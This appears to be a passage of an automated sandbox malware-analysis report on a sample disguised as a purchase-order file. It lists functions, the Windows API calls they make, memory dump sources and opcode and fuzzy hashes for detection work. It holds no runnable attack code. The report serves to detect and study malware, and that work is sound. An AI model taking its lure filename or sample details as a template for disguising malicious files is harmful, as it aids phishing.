                                                                      • Instruction ID: f0c2977cb20e6558c2e773556eb83bc0584892ec035bd6653f77e23ad75a478d
                                                                      • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                      • Instruction Fuzzy Hash: 1DE0C233905120ABC6315F44FE0472A7B7CAF48B22F020067EC447B3A087786C528BCC
                                                                      Function 004057C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 004057CB
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 004057D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1876063424
                                                                      • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                      • Instruction ID: d39d8f188df628cf061828239c0557f0f3bbaa41193ad9941d070ee56f497fe5
                                                                      • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                      • Instruction Fuzzy Hash: E5D0A772408D706EF30352109C04B8F6A48CF26300F090463F040A3191C27C5D424BBE
                                                                      Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                      • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                      • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                      • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                      Function 004058E4 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040590C
                                                                      • CharNextA.USER32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040591D
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                      • Instruction ID: 7adaab352aa717b916c044831a99f4991ef712c09a2c9b56ba9fed1a583d178e
                                                                      • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                      • Instruction Fuzzy Hash: 43F09636505518FFC7129FA5DC0099EBBB8EF16360B2540B9F801F7360D674EE019BA9